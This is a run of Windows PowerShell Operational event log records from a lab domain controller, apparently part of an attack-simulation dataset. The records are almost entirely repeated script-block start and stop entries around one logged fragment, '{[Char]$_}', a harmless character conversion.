Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472925
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472924
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472923
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472922
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472921
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472920
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472919
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472918
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472917
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472916
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472915
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472914
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472913
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472912
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472911
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472910
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472909
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472908
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472907
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472906
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472905
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472904
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472903
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472902
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472901
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472900
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472899
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472898
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472897
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472896
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472895
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472894
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472893
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472892
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472891
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472890
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472889
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472888
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472887
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472886
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472885
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472884
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472883
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472882
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472881
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472880
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472879
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472878
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472877
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472876
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472875
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472874
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1472873
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{[Char]$_}

ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Path:
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472872
Keywords=None
Message=Completed invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472871
Keywords=None
Message=Started invocation of ScriptBlock ID: 89ebd1bb-8d1f-4a8b-aaa6-51de65f8ffff
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
